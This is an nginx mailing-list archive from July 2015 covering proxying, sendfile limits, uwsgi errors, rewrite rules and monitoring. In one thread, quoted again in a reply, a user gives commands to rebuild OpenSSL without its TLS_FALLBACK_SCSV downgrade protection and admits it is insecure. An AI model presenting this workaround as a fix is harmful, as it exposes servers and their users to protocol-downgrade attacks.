mdounin.ru (Maxim Dounin) Date: Tue, 14 Jul 2015 23:13:22 +0300 Subject: Nginx with Organization PROXY server In-Reply-To: <3ad334445cd816349bd325851b28ccd9.NginxMailingListEnglish@forum.nginx.org> References: <20150714191235.GY93501@mdounin.ru> <3ad334445cd816349bd325851b28ccd9.NginxMailingListEnglish@forum.nginx.org> Message-ID: <20150714201322.GZ93501@mdounin.ru> Hello! On Tue, Jul 14, 2015 at 03:30:11PM -0400, shay.peretz at capriza.com wrote: > Any plan for supporting it ? No. 
-- Maxim Dounin http://nginx.org/ From tekberg at uw.edu Tue Jul 14 20:47:01 2015 From: tekberg at uw.edu (Tom Ekberg) Date: Tue, 14 Jul 2015 13:47:01 -0700 (PDT) Subject: nginx for Postgres servers Message-ID: I know nginx is designed to handle web and mail servers. Does it make sense to use to handle multiple (in our case 2) PostgreSQL database servers? Tom Ekberg Senior Computer Specialist, Lab Medicine University of Washington Medical Center 1959 NE Pacific St, MS 357110 Seattle WA 98195 work: (206) 598-8544 email: tekberg at uw.edu From miguelmclara at gmail.com Tue Jul 14 21:52:11 2015 From: miguelmclara at gmail.com (Miguel Clara) Date: Tue, 14 Jul 2015 21:52:11 +0000 Subject: nginx for Postgres servers In-Reply-To: References: Message-ID: <38DF1F4A-3A70-4EC5-ADB3-766D919AD9E5@gmail.com> You mean something like: https://github.com/FRiCKLE/ngx_postgres ? On July 14, 2015 9:47:01 PM GMT+01:00, Tom Ekberg wrote: >I know nginx is designed to handle web and mail servers. Does it make >sense to use to handle multiple (in our case 2) PostgreSQL database >servers? > >Tom Ekberg >Senior Computer Specialist, Lab Medicine >University of Washington Medical Center >1959 NE Pacific St, MS 357110 >Seattle WA 98195 >work: (206) 598-8544 >email: tekberg at uw.edu > > >_______________________________________________ >nginx mailing list >nginx at nginx.org >http://mailman.nginx.org/mailman/listinfo/nginx -- Sent from my Android device with K-9 Mail. Please excuse my brevity. -------------- next part -------------- An HTML attachment was scrubbed... URL: From arut at nginx.com Tue Jul 14 23:54:10 2015 From: arut at nginx.com (Roman Arutyunyan) Date: Tue, 14 Jul 2015 16:54:10 -0700 Subject: nginx for Postgres servers In-Reply-To: References: Message-ID: Hello Tom, If you want to proxy PostgreSQL connections with nginx, you can use the stream (tcp) proxy for this. 
Obviously, it will not keep a persistent connection to the database server, but will open a new connection for each client. http://nginx.org/en/docs/stream/ngx_stream_core_module.html > On 14 Jul 2015, at 13:47, Tom Ekberg wrote: > > I know nginx is designed to handle web and mail servers. Does it make sense to use to handle multiple (in our case 2) PostgreSQL database servers? > > Tom Ekberg > Senior Computer Specialist, Lab Medicine > University of Washington Medical Center > 1959 NE Pacific St, MS 357110 > Seattle WA 98195 > work: (206) 598-8544 > email: tekberg at uw.edu > > > _______________________________________________ > nginx mailing list > nginx at nginx.org > http://mailman.nginx.org/mailman/listinfo/nginx > -- Roman Arutyunyan From nginx-forum at nginx.us Wed Jul 15 01:46:58 2015 From: nginx-forum at nginx.us (justink101) Date: Tue, 14 Jul 2015 21:46:58 -0400 Subject: Storing $server_addr in a variable VS using it directly in location block Message-ID: <9eb5f803b00bc4479ae6ac5f6d73e5a2.NginxMailingListEnglish@forum.nginx.org> According to the documentation getting the value of $server_addr to set a response header makes a system call, and can impact performance negativelyset $ip $server_addr; server { location /health { add_header Backend $server_addr; return 200; } } Would the following be a better solution, and eliminate the system call on every request? 
server {
    set $ip $server_addr;

    location /health {
        add_header Backend $ip always;
        return 200;
    }
}

Posted at Nginx Forum: http://forum.nginx.org/read.php?2,260304,260304#msg-260304

From nginx-forum at nginx.us Wed Jul 15 01:58:52 2015
From: nginx-forum at nginx.us (tempspace)
Date: Tue, 14 Jul 2015 21:58:52 -0400
Subject: Intermittent SSL Handshake Errors
In-Reply-To: References:
Message-ID: <9bd243967b2103df4602fb43702e7722.NginxMailingListEnglish@forum.nginx.org>

Here's what we've learned so far:

The issue is related to a new security feature that blocks TLS Fallback, which is a client that connects with one version of TLS, then tries to downgrade the connection and connect with a lower TLS version. It was a feature made in light of the Poodle SSL vulnerability in order to keep SSL secure. The problem is that many networking libraries still exhibit this behavior of downgrading TLS versions on purpose, which OpenSSL then blocks the connection.

Specifically, the NSURLConnection class on iOS exhibits this behavior. NSURLSession, the latest iteration of this client, does not. The problem is, if you want to support iOS 6 still, you HAVE to use NSURLConnection. We decided to end support for iOS 6 because of this. NSURLConnection is also completely deprecated in iOS 9, so if you want to support iOS 9, you'll have to upgrade your client library anyway.

On Android, the same thing happened, but not as often and between different TLS versions. Switching to Square's Retrofit client for SSL purposes has worked really well for us.

So, the real fix is to make sure you update your clients. If you're on a Debian wheezy box, you can make your own openssl package with the latest version, but with TLS_FALLBACK_SCSV support removed by following the directions below. Note, this is not recommended from a security perspective, but if your environment is broken, you need to do what you need to do. As long as SSL v3 is disabled, there's no big, active vulnerability in the wild that takes advantage of fallback at the moment.

Set up dquilt as shown on
https://www.debian.org/doc/manuals/maint-guide/modify.en.html

Building Package:
apt-get update ; apt-get source libssl1.0.0
cd openssl-1.0.1e
dquilt pop Support-TLS_FALLBACK_SCSV
dquilt delete Support-TLS_FALLBACK_SCSV
dpkg-source --commit
dpkg-buildpackage

The debian packages will be one directory back. Make sure to install the libssl packages you created, not just openssl, and nginx will need a restart to use the new library, not just a reload.

I hope this helps someone, we spent a good amount of time on this.

Posted at Nginx Forum: http://forum.nginx.org/read.php?2,256373,260305#msg-260305

From mandre at eso.org Wed Jul 15 07:48:50 2015
From: mandre at eso.org (Mathias Andre)
Date: Wed, 15 Jul 2015 09:48:50 +0200
Subject: Lost connection after reading 2147479552 bytes with sendfile
In-Reply-To: <20150711224348.GA93501@mdounin.ru>
References: <20150710160130.GB16679@eso.org> <20150711224348.GA93501@mdounin.ru>
Message-ID: <20150715074850.GY17354@eso.org>

Hi,

Thanks for the detailed reply!

* Maxim Dounin wrote:

> The 2147479552 is a limit applied by default to allow sendfile()
> to work with larger files on Linux up to 2.6.16 (see
> src/os/unix/ngx_linux_sendfile_chain.c for some comments). You can see the
> same limit on the first sendfile() call in the Ubuntu log as well.

Indeed, I had also seen a lot of reference to this "magic" number around, so I thought it might be related to it.

> The strange thing here is that on Scientific Linux 6 the call
> pretends it send all the bytes in a single non-blocking call.
> This is not nginx expects to ever happen, and this is what causes
> the problem to appear. It would be interesting to dig further to
> understand what causes this SL6 behaviour.

OK, I did write a tiny test program to try and reproduce the problem on the SL box: it tries to copy 4GB from an existing file in one sendfile call: https://gist.github.com/mathiasuk/cf46d0f0caf1dd597e59 As expected the sendfile calls return 2147479552, and the output file is indeed 2147479552 bytes long, so this seems to work. Here's the trace: https://gist.github.com/mathiasuk/694177cf6446428f9498 I wonder if this could be because my test uses an output file and not a socket. I'll try and investigate some more. > Using sendfile_max_chunk with some large value is a correct > workaround and expected to work fine. Thanks! Mathias From nginx-forum at nginx.us Wed Jul 15 11:04:50 2015 From: nginx-forum at nginx.us (dgobaud) Date: Wed, 15 Jul 2015 07:04:50 -0400 Subject: Dropped https client connection doesn't drop backend proxy_pass connection In-Reply-To: <20150714173557.GX93501@mdounin.ru> References: <20150714173557.GX93501@mdounin.ru> Message-ID: <628cace4e5c7dd8fe6f300b9cd055cce.NginxMailingListEnglish@forum.nginx.org> Hi! Thanks for replying. It appears the issue might actually be on the AWS side. AWS is looking into it. Think its an issue with the elastic load balancer. Posted at Nginx Forum: http://forum.nginx.org/read.php?2,237386,260318#msg-260318 From vbart at nginx.com Wed Jul 15 11:07:54 2015 From: vbart at nginx.com (Valentin V. 
Bartenev) Date: Wed, 15 Jul 2015 14:07:54 +0300 Subject: Storing $server_addr in a variable VS using it directly in location block In-Reply-To: <9eb5f803b00bc4479ae6ac5f6d73e5a2.NginxMailingListEnglish@forum.nginx.org> References: <9eb5f803b00bc4479ae6ac5f6d73e5a2.NginxMailingListEnglish@forum.nginx.org> Message-ID: <1844173.35knXJSr6u@vbart-laptop> On Tuesday 14 July 2015 21:46:58 justink101 wrote: > According to the documentation getting the value of $server_addr to set a > response header makes a system call, and can impact performance > negativelyset $ip $server_addr; > > server { > location /health { > add_header Backend $server_addr; > return 200; > } > } > > Would the following be a better solution, and eliminate the system call on > every request? > > server { > set $ip $server_addr; > > location /health { > add_header Backend $ip always; > return 200; > } > } > No, it wouldn't. The "set" directive also is executed on every request. wbr, Valentin V. Bartenev From nginx-forum at nginx.us Wed Jul 15 11:45:34 2015 From: nginx-forum at nginx.us (itpp2012) Date: Wed, 15 Jul 2015 07:45:34 -0400 Subject: Storing $server_addr in a variable VS using it directly in location block In-Reply-To: <1844173.35knXJSr6u@vbart-laptop> References: <1844173.35knXJSr6u@vbart-laptop> Message-ID: Valentin V. Bartenev Wrote: ------------------------------------------------------- > On Tuesday 14 July 2015 21:46:58 justink101 wrote: > > According to the documentation getting the value of $server_addr to > set a > > response header makes a system call, and can impact performance > > negativelyset $ip $server_addr; > No, it wouldn't. The "set" directive also is executed on every > request. Via map as well ? (geo would suffer as well then) Posted at Nginx Forum: http://forum.nginx.org/read.php?2,260304,260320#msg-260320 From vbart at nginx.com Wed Jul 15 12:26:51 2015 From: vbart at nginx.com (Valentin V. 
Bartenev) Date: Wed, 15 Jul 2015 15:26:51 +0300 Subject: Storing $server_addr in a variable VS using it directly in location block In-Reply-To: References: <1844173.35knXJSr6u@vbart-laptop> Message-ID: <12723119.nmceJqzvDj@vbart-laptop> On Wednesday 15 July 2015 07:45:34 itpp2012 wrote: > Valentin V. Bartenev Wrote: > ------------------------------------------------------- > > On Tuesday 14 July 2015 21:46:58 justink101 wrote: > > > According to the documentation getting the value of $server_addr to > > > set a > > > response header makes a system call, and can impact performance > > > negativelyset $ip $server_addr; > > > No, it wouldn't. The "set" directive also is executed on every > > request. > > Via map as well ? (geo would suffer as well then) > All variables work on a per requests basis, no exceptions. wbr, Valentin V. Bartenev From zxcvbn4038 at gmail.com Wed Jul 15 14:27:03 2015 From: zxcvbn4038 at gmail.com (CJ Ess) Date: Wed, 15 Jul 2015 10:27:03 -0400 Subject: Nginx with Organization PROXY server In-Reply-To: References: Message-ID: Try incorporating haproxy (http://www.haproxy.org/) or Apache Traffic Server (http://trafficserver.apache.org/) into your setup. I use NGINX to terminate SSL/SPDY then haproxy to direct the request to the appropriate backend server pool - Haproxy is very good at being a reverse proxy but has no forward proxy features. ATS can terminate SSL/SPDY/HTTP2 and function very well as a forward or reverse proxy, but lacks the pooling, manipulation, and routing facilities that haproxy and nginx provide. 
On Tue, Jul 14, 2015 at 9:49 AM, Shay Peretz wrote: > Hello , > > on a linux box I define to move the traffic through some Centralize > proxy server ( Organization one ) > in order to configure the proxy from the command line I ran : > export HTTP_PROXY="http://:" > > On the same box I have nginx which serve as a reverse proxy and all > the local application sending the traffic through the local reverse > proxy > > > how can I force the nginx to fwd all the traffic through the ORG proxy > server ? > > chart ... > > > Linux Box Proxy > server | Internet | > |--------------------------------------------| => > |---------------------------| => > -> < nginx > Organization Proxy > | | > > > Thanks ! > > _______________________________________________ > nginx mailing list > nginx at nginx.org > http://mailman.nginx.org/mailman/listinfo/nginx > -------------- next part -------------- An HTML attachment was scrubbed... URL: From mdounin at mdounin.ru Wed Jul 15 16:09:27 2015 From: mdounin at mdounin.ru (Maxim Dounin) Date: Wed, 15 Jul 2015 19:09:27 +0300 Subject: Intermittent SSL Handshake Errors In-Reply-To: <9bd243967b2103df4602fb43702e7722.NginxMailingListEnglish@forum.nginx.org> References: <9bd243967b2103df4602fb43702e7722.NginxMailingListEnglish@forum.nginx.org> Message-ID: <20150715160927.GC93501@mdounin.ru> Hello! On Tue, Jul 14, 2015 at 09:58:52PM -0400, tempspace wrote: > Here's what we've learned so far: > > The issue is related to a new security feature that blocks TLS Fallback, > which is a client that connects with one version of TLS, then tries to > downgrade the connection and connect with a lower TLS version.. It was a > feature made in light of the Poodle SSL vulnerability in order to keep SSL > secure. The problem is that many networking libraries still exhibit this > behavior of downgrading TLS versions on purpose, which OpenSSL then blocks > the connection. > > Specificially, the NSURLConnection class on iOS exhibits this behavior. 
> NSURLSession, the latest iteration of this client, does not. The problem is, > if you want to support iOS 6 still, you HAVE to use NSURLConnection. We > decided to end support for iOS 6 because of this. NSURLConnection is also > completely depracated in iOS 9, so if you want to support iOS 9, you'll have > to upgrade your client library anyway. > > On Android, the same thing happened, but not as often and between different > TLS versions. Switching to Square's Retrofit client for SSL purposes has > worked really well for us. > > So, the real fix is to make sure you update your clients. If you're on a > Debian wheezy box, you can make your own openssl package with the latest > version, but with TLS_FALLBACK_SCSV support removed by following the > directions below. Note, this is not recommended from a security perspective, > but if your environment is broken, you need to do what you need to do. As > long as SSL v3 is disabled, there's no big, active vulnerability in the wild > that takes advantage of fallback at the moment. > > Setup dquilt as shown on > https://www.debian.org/doc/manuals/maint-guide/modify.en.html > > Building Package: > apt-get update ; apt-get source libssl1.0.0 > cd openssl-1.0.1e > dquilt pop Support-TLS_FALLBACK_SCSV > dquilt delete Support-TLS_FALLBACK_SCSV > dpkg-source --commit > dpkg-buildpackage > > The debian packages will be one directory back. Make sure to install the > libssl packages you created, not just openssl, and nginx will need a restart > to use the new library, not just a reload. > > I hope this helps someone, we spent a good amount of time on this. Thanks for the info, appreciated. 
-- Maxim Dounin http://nginx.org/ From nginx-forum at nginx.us Wed Jul 15 19:13:00 2015 From: nginx-forum at nginx.us (shay.peretz@capriza.com) Date: Wed, 15 Jul 2015 15:13:00 -0400 Subject: Nginx with Organization PROXY server In-Reply-To: References: Message-ID: <998204d62793ea1dee0f1c0be4c8adb8.NginxMailingListEnglish@forum.nginx.org> Thanks for the recommendation , I am using nginx as a reverse proxy on each one of my application server . the reason I am doing it is , my application server connect to a backend system which can be available on 2 domains , the nginx as a reverse proxy on my application system verify that if one domain is down it automatically use the 2nd one which might be available . The problem I am having is once the application server need to connect to the backend through a proxy server , the nginx dont know how to move the traffic through a proxy which require authentication and configuration . I start check how complex will it be to update the nginx source code , Can anyone from the nginx team estimate how complex it will be if possible @ all ? Posted at Nginx Forum: http://forum.nginx.org/read.php?2,260278,260332#msg-260332 From nginx-forum at nginx.us Thu Jul 16 12:19:34 2015 From: nginx-forum at nginx.us (smsmaddy1981) Date: Thu, 16 Jul 2015 08:19:34 -0400 Subject: nginx_status Message-ID: Hi Team, I am configured to use nginx_status and I can see the expected result on the browser Now, the query is: the /nginx_status configuration is done on the server block. Is this required to be repeated for every server block exists in the nginx.conf file? Or any feasibility to set globally for all the servers. Pls. 
update Regards, Maddy Posted at Nginx Forum: http://forum.nginx.org/read.php?2,260370,260370#msg-260370 From nginx-forum at nginx.us Thu Jul 16 12:23:17 2015 From: nginx-forum at nginx.us (smsmaddy1981) Date: Thu, 16 Jul 2015 08:23:17 -0400 Subject: Health Monitoring Message-ID: <52f4960f7a66e5aa2d897e105fa47b28.NginxMailingListEnglish@forum.nginx.org> What is the best way to perform health check of Nginx server? Backup Nginx server is recommended, in case of risks with Primary Nginx server? Posted at Nginx Forum: http://forum.nginx.org/read.php?2,260371,260371#msg-260371 From mdounin at mdounin.ru Thu Jul 16 17:24:55 2015 From: mdounin at mdounin.ru (Maxim Dounin) Date: Thu, 16 Jul 2015 20:24:55 +0300 Subject: nginx_status In-Reply-To: References: Message-ID: <20150716172455.GR93501@mdounin.ru> Hello! On Thu, Jul 16, 2015 at 08:19:34AM -0400, smsmaddy1981 wrote: > Hi Team, > I am configured to use nginx_status and I can see the expected result on the > browser > > Now, the query is: the /nginx_status configuration is done on the server > block. Is this required to be repeated for every server block exists in the > nginx.conf file? Or any feasibility to set globally for all the servers. There is no need to configure stub_status for each server{} block, stats are global and they are always collected. You just need to configure it in one location to make it possible to access stats. -- Maxim Dounin http://nginx.org/ From mdounin at mdounin.ru Thu Jul 16 18:38:36 2015 From: mdounin at mdounin.ru (Maxim Dounin) Date: Thu, 16 Jul 2015 21:38:36 +0300 Subject: Lost connection after reading 2147479552 bytes with sendfile In-Reply-To: <20150715074850.GY17354@eso.org> References: <20150710160130.GB16679@eso.org> <20150711224348.GA93501@mdounin.ru> <20150715074850.GY17354@eso.org> Message-ID: <20150716183836.GV93501@mdounin.ru> Hello! On Wed, Jul 15, 2015 at 09:48:50AM +0200, Mathias Andre wrote: > Hi, > > Thanks for the detailed reply! 
> > * Maxim Dounin wrote: > > > > > The 2147479552 is a limit applied by default to allow sendfile() > > to work with larger files on Linux up to 2.6.16 (see > > src/os/unix/ngx_linux_sendfile_chain.c for some comments). You can see the > > same limit on the first sendfile() call in the Ubuntu log as well. > > Indeed, I had also seen a lot of reference to this "magic" number around, > so I thought it might be related to it. > > > The strange thing here is that on Scientific Linux 6 the call > > pretends it send all the bytes in a single non-blocking call. > > This is not nginx expects to ever happen, and this is what causes > > the problem to appear. It would be interesting to dig further to > > understand what causes this SL6 behaviour. > > OK, I did write a tiny test program to try and reproduce the problem on > the SL box: it tries to copy 4GB from an existing file in one sendfile > call: > https://gist.github.com/mathiasuk/cf46d0f0caf1dd597e59 > > As expected the sendfile calls return 2147479552, and the output file is > indeed 2147479552 bytes long, so this seems to work. > Here's the trace: > https://gist.github.com/mathiasuk/694177cf6446428f9498 > > I wonder if this could be because my test uses an output file and not a > socket. I'll try and investigate some more. The question is "how this can legitimately happen on a non-blocking socket". The "socket" and "non-blocking" parts are both important. For sure this can happen on a file and/or blocking socket. -- Maxim Dounin http://nginx.org/ From steve at greengecko.co.nz Fri Jul 17 00:40:22 2015 From: steve at greengecko.co.nz (steve) Date: Fri, 17 Jul 2015 12:40:22 +1200 Subject: Health Monitoring In-Reply-To: <52f4960f7a66e5aa2d897e105fa47b28.NginxMailingListEnglish@forum.nginx.org> References: <52f4960f7a66e5aa2d897e105fa47b28.NginxMailingListEnglish@forum.nginx.org> Message-ID: <55A84EF6.3060709@greengecko.co.nz> I monitor everything using munin, but any MRTG based product ( thanks again Tobi Oetiker! 
) will do the job. On 17/07/15 00:23, smsmaddy1981 wrote: > What is the best way to perform health check of Nginx server? > > Backup Nginx server is recommended, in case of risks with Primary Nginx > server? > > Posted at Nginx Forum: http://forum.nginx.org/read.php?2,260371,260371#msg-260371 > > _______________________________________________ > nginx mailing list > nginx at nginx.org > http://mailman.nginx.org/mailman/listinfo/nginx -- Steve Holdoway BSc(Hons) MIITP http://www.greengecko.co.nz Linkedin: http://www.linkedin.com/in/steveholdoway Skype: sholdowa From pchychi at gmail.com Fri Jul 17 04:51:22 2015 From: pchychi at gmail.com (Payam Chychi) Date: Thu, 16 Jul 2015 21:51:22 -0700 Subject: Health Monitoring In-Reply-To: <55A84EF6.3060709@greengecko.co.nz> References: <52f4960f7a66e5aa2d897e105fa47b28.NginxMailingListEnglish@forum.nginx.org> <55A84EF6.3060709@greengecko.co.nz> Message-ID: <4494CCC1B4E44E679738FA56E5F8B591@gmail.com> Cacti, great and does everything and more -- Payam Chychi Network Engineer / Security Specialist On Thursday, July 16, 2015 at 5:40 PM, steve wrote: > I monitor everything using munin, but any MRTG based product ( thanks > again Tobi Oetiker! ) will do the job. > > On 17/07/15 00:23, smsmaddy1981 wrote: > > What is the best way to perform health check of Nginx server? > > > > Backup Nginx server is recommended, in case of risks with Primary Nginx > > server? 
> > > > Posted at Nginx Forum: http://forum.nginx.org/read.php?2,260371,260371#msg-260371 > > > > _______________________________________________ > > nginx mailing list > > nginx at nginx.org > > http://mailman.nginx.org/mailman/listinfo/nginx > > > > > -- > Steve Holdoway BSc(Hons) MIITP > http://www.greengecko.co.nz > Linkedin: http://www.linkedin.com/in/steveholdoway > Skype: sholdowa > > _______________________________________________ > nginx mailing list > nginx at nginx.org > http://mailman.nginx.org/mailman/listinfo/nginx > > -------------- next part -------------- An HTML attachment was scrubbed... URL: From gaccardo at gmail.com Fri Jul 17 12:09:22 2015 From: gaccardo at gmail.com (Guido) Date: Fri, 17 Jul 2015 09:09:22 -0300 Subject: Problem with nginx + uwsgi Message-ID: Hi everybody, I'm having a problem with my nginx and uwsgi. I don't really know what I'm doing wrong. Here is the configuration of nginx: server { listen 80; location /api/v1 { uwsgi_pass unix:///tmp/api.sock; include uwsgi_params; } location / { return 444; } And this is uwsgi configuration: [uwsgi] socket = /tmp/api.sock chdir = /var/www/api master = true plugin = python pp = /home/api/src file = uwsgi.py uid = www-data gid = www-data threads = 4 workers = 4 callable = app chmod-socket = 666 post-buffering = 4096 virtualenv = /usr/local/venvs/api callable = ins env = API_SETTINGS_FILE=../../etc/settings.py If I execute following command everything seems to be working fine: curl -v http://127.0.0.1/api/v1/login { "message": "Method Not Allowed", "status": 405 } HTTP/405 it's the expected answer since the app doesn't allow login resquets with GET method, So now I'm going to try with POST. 
The application expects for data such as email and password, so this should trigger a 500 in the api backend curl http://10.10.10.35/api/v1/login -X POST uwsgi log: [pid: 19484|app: 0|req: 5/5] 127.0.0.1 () {30 vars in 340 bytes} [Fri Jul 17 12:05:00 2015] POST /api/v1/login => generated 0 bytes in 432 msecs (HTTP/1.1 500) 0 headers in 0 bytes (0 switches on core 0) Everything good but the answer of nginx it's wrong: 502 Bad Gateway

nginx/1.7.1
So for any reason nginx interpret the HTTP/500 from the API as the gateway it's no available. Do you see what I'm doing wrong? More info: Nginx 1.8.0 Ubuntu 12.04 uWSGI 1.0.3 Thanks in advance -- -- Guido Accardo -- "... What we know is a drop, what we ignore is the ocean ..." Isaac Newton -------------- next part -------------- An HTML attachment was scrubbed... URL: From nginx-forum at nginx.us Fri Jul 17 15:12:42 2015 From: nginx-forum at nginx.us (dr.net) Date: Fri, 17 Jul 2015 11:12:42 -0400 Subject: Rewrite rules in nginx config Message-ID: Hi all, thank's to accept me in this forum. I'm a newbie... I have a problem with a rewrite rules that I imported from apache This is my code index home.php index.php; location / { rewrite ^/(.*)?$ /categories.php?cat=$1; rewrite ^/(.*).html?$ /game.php?game=$1; rewrite ^/(.*)/(.*).html?$ /game.php?game=$2 break; } location /dists/ { # Do nothing. nginx will serve files as usual. } location /images/ { # Do nothing. nginx will serve files as usual. } location /admin/ { # Do nothing. nginx will serve files as usual. } location /css/ { # Do nothing. nginx will serve files as usual. } location /config/ { # Do nothing. nginx will serve files as usual. } I'd like ti take parameters from cat and game and use them to know the path. This is oc, but so... all others directories don't work. Is this configuration so insensitive? Posted at Nginx Forum: http://forum.nginx.org/read.php?2,260404,260404#msg-260404 From miguelmclara at gmail.com Fri Jul 17 15:35:54 2015 
From: miguelmclara at gmail.com (Miguel C) Date: Fri, 17 Jul 2015 16:35:54 +0100 Subject: Rewrite rules in nginx config In-Reply-To: References: Message-ID: On Fri, Jul 17, 2015 at 4:12 PM, dr.net wrote: > Hi all, > thank's to accept me in this forum. > > I'm a newbie... I have a problem with a rewrite rules that I imported from > apache > > This is my code > > > index home.php index.php; > location / { > rewrite ^/(.*)?$ /categories.php?cat=$1; > rewrite ^/(.*).html?$ /game.php?game=$1; > rewrite ^/(.*)/(.*).html?$ /game.php?game=$2 break; > } > Before anything... you seem to want to serve PHP, but I don't see anything in the config pointing to a php backend such as php-fpm... > location /dists/ { > # Do nothing. nginx will serve files as usual. > } > > location /images/ { > # Do nothing. nginx will serve files as usual. > } > location /admin/ { > # Do nothing. nginx will serve files as usual. > } > location /css/ { > # Do nothing. nginx will serve files as usual. > } > location /config/ { > # Do nothing. nginx will serve files as usual. > } > As for this locations you could simplify to just one whats the "root" path? you don't seem to define one, unless you didn't paste the full config. > I'd like ti take parameters from cat and game and use them to know the path. > > This is oc, but so... all others directories don't work. > Is this configuration so insensitive? > > Posted at Nginx Forum: http://forum.nginx.org/read.php?2,260404,260404#msg-260404 > > _______________________________________________ > nginx mailing list > nginx at nginx.org > http://mailman.nginx.org/mailman/listinfo/nginx From nginx at netdirect.fr Fri Jul 17 15:40:20 2015 
From: nginx at netdirect.fr (Artur) Date: Fri, 17 Jul 2015 17:40:20 +0200 Subject: try_files setup In-Reply-To: <559FE1CF.6010703@netdirect.fr> References: <559FE1CF.6010703@netdirect.fr> Message-ID: <55A921E4.6060103@netdirect.fr> No one has any idea about the solution for this problem ? -- Best regards, Artur. -------------- next part -------------- An HTML attachment was scrubbed... URL: From nginx-forum at nginx.us Fri Jul 17 16:04:03 2015 From: nginx-forum at nginx.us (dr.net) Date: Fri, 17 Jul 2015 12:04:03 -0400 Subject: Rewrite rules in nginx config In-Reply-To: References: Message-ID: <744e6653f53a838e87fb9db5e37570a9.NginxMailingListEnglish@forum.nginx.org> Hi Mike, thank's for reply. I haven't posted all the config because the server is maintained and I have to send to administrator only che rewrite config The php-fpm works Posted at Nginx Forum: http://forum.nginx.org/read.php?2,260404,260408#msg-260408 From miguelmclara at gmail.com Fri Jul 17 16:20:32 2015 From: miguelmclara at gmail.com (Miguel C) Date: Fri, 17 Jul 2015 17:20:32 +0100 Subject: try_files setup In-Reply-To: <55A921E4.6060103@netdirect.fr> References: <559FE1CF.6010703@netdirect.fr> <55A921E4.6060103@netdirect.fr> Message-ID: Add this to the php location try_files $uri =404; Melhores Cumprimentos // Best Regards ----------------------------------------------- Miguel Clara IT - Sys Admin & Developer On Fri, Jul 17, 2015 at 4:40 PM, Artur wrote: > No one has any idea about the solution for this problem ? > > -- > > Best regards, > Artur. > > > _______________________________________________ > nginx mailing list > nginx at nginx.org > http://mailman.nginx.org/mailman/listinfo/nginx From nginx-forum at nginx.us Fri Jul 17 21:49:23 2015 
From: nginx-forum at nginx.us (ecflyer) Date: Fri, 17 Jul 2015 17:49:23 -0400 Subject: [Nginx] How to support file upload in Nginx 1.8 In-Reply-To: References: Message-ID: <80467348404becadd56c2a384e7e60b4.NginxMailingListEnglish@forum.nginx.org> I'm very new, a novice when it comes to nginx and setting up a web server, and trying to figure out how to upload files. We already have an Apache solution with PHP, but do not want to use PHP anymore. I've looked over this tutorial but could not get it to work: https://coderwall.com/p/swgfvw/nginx-direct-file-upload-without-passing-them-through-backend Is there a really elementary step-by-step explanation for adding upload capability through a post command? I mean, I'm not even sure where all the files and folders are supposed to go. Finally, we will not be uploading files through a web-browser, but from desktop and mobile applications. So any explanations related to that may not be helpful. Sorry to be such a newbie, but I don't have a ton of experience outside my programming language: LiveCode. But I am diving in trying to learn more. I'm on Ubuntu 14.04 using nginx 1.8.0. I also added the nginx_upload_module to my build; not sure if this is causing problems trying to use clientbodyinfileonly. TIA, e Posted at Nginx Forum: http://forum.nginx.org/read.php?2,259249,260411#msg-260411 From ben+nginx at list-subs.com Sat Jul 18 10:37:33 2015 
From: ben+nginx at list-subs.com (Ben)
Date: Sat, 18 Jul 2015 11:37:33 +0100
Subject: Conditional access log formatting ?
Message-ID: <55AA2C6D.8090106@list-subs.com>

Hi,

I'm using haproxy in front of some NGINX instances, but only for some instances which are being load balanced by haproxy, there are other instances which go straight through.

I realise I need to change the logging format in NGINX to enable X-Forwarded-For in the access logs.

The question is whether I can conditionally format the logs, i.e. use "X-Forwarded-For" if it exists, otherwise use the normal NGINX logging format.

I've had a quick peek at the manual, I'm thinking maybe this can be done with a map of some sort ? Maybe there's a better way ? To be honest I've no idea where to start, and I've never used maps before anyway !

From nginx-forum at nginx.us Sat Jul 18 12:15:26 2015
From: nginx-forum at nginx.us (xfeep)
Date: Sat, 18 Jul 2015 08:15:26 -0400
Subject: [ANN]nginx-access-plus v0.1.0 released!
Message-ID:

Nginx-Access-Plus is an Nginx module that allows limiting access to certain http request methods and client addresses.

e.g.

location / {
    allow_method all get|head;
    allow_method 192.168.1.0/24 post|delete;
    deny_method all all;
}

website : https://github.com/nginx-clojure/nginx-access-plus

Posted at Nginx Forum: http://forum.nginx.org/read.php?2,260414,260414#msg-260414

From nginx-forum at nginx.us Sat Jul 18 12:32:00 2015
From: nginx-forum at nginx.us (xfeep) Date: Sat, 18 Jul 2015 08:32:00 -0400 Subject: [ANN]nginx-access-plus v0.1.0 released! In-Reply-To: References: Message-ID: <0f4da6b920a1abf9cdc808f177f09a82.NginxMailingListEnglish@forum.nginx.org> Nginx-Access-Plus is a Nginx module allows limiting access to certain http request methods and client addresses. e.g. location / { allow_method all get|head; allow_method 192.168.1.0/24 post|delete; deny_method all all; } website : https://github.com/nginx-clojure/nginx-access-plus Posted at Nginx Forum: http://forum.nginx.org/read.php?2,260414,260415#msg-260415 From marcus.james at gmail.com Sat Jul 18 16:29:27 2015 
From: marcus.james at gmail.com (James Marcus)
Date: Sat, 18 Jul 2015 12:29:27 -0400
Subject: browser downloading html files
Message-ID:

Hi,

Haven't used nginx in few years and trying to get it into production. I'm having what will probably be a silly misconfiguration to most.

I'm running nginx
nginx-1.8.0-1.el7.ngx.x86_64
CentOS 7 with PHP-fpm

When I hit every PHP link on this site it generates some html and my browser downloads it.

I used the winginx .htaccess converter to create the rewrite rules.

Any direction would be great

Thanks,
James

Here is my config:

server {
    listen 80;
    server_name www.imagesite.net *.imagesite.net;
    root /var/www/imagesite.net/html;
    index index.php;
    error_page 404 /404.html;

    # redirect server error pages to the static page /50x.html
    #
    error_page 500 502 503 504 /50x.html;
    location = /50x.html {
        root /usr/share/nginx/html;
    }

    # pass the PHP scripts to FastCGI server listening on 127.0.0.1:9000
    #
    location ~ \.php$ {
        root html;
        fastcgi_pass 127.0.0.1:9000;
        fastcgi_intercept_errors on;
        fastcgi_index index.php;
        fastcgi_param SCRIPT_FILENAME /var/www/imagesite.net/html$fastcgi_script_name;
        include fastcgi_params;
    }

    # deny access to .htaccess files, if Apache's document root
    # concurs with nginx's one
    #
    location ~ /\.ht {
        deny all;
    }

    autoindex off;

    location / {
        autoindex off;
        rewrite ^/([^/]*)/([^/]*)/([^/]*)\.html$ /item.php?parentcategorie=$1&categorie=$2&fx=$3 break;
        rewrite ^/([^/]*)/$ /cat.php?parentcategorie=$1 break;
        rewrite ^/([^/]*)/([^/]*)/$ /subcat.php?parentcategorie=$1&categorie=$2 break;
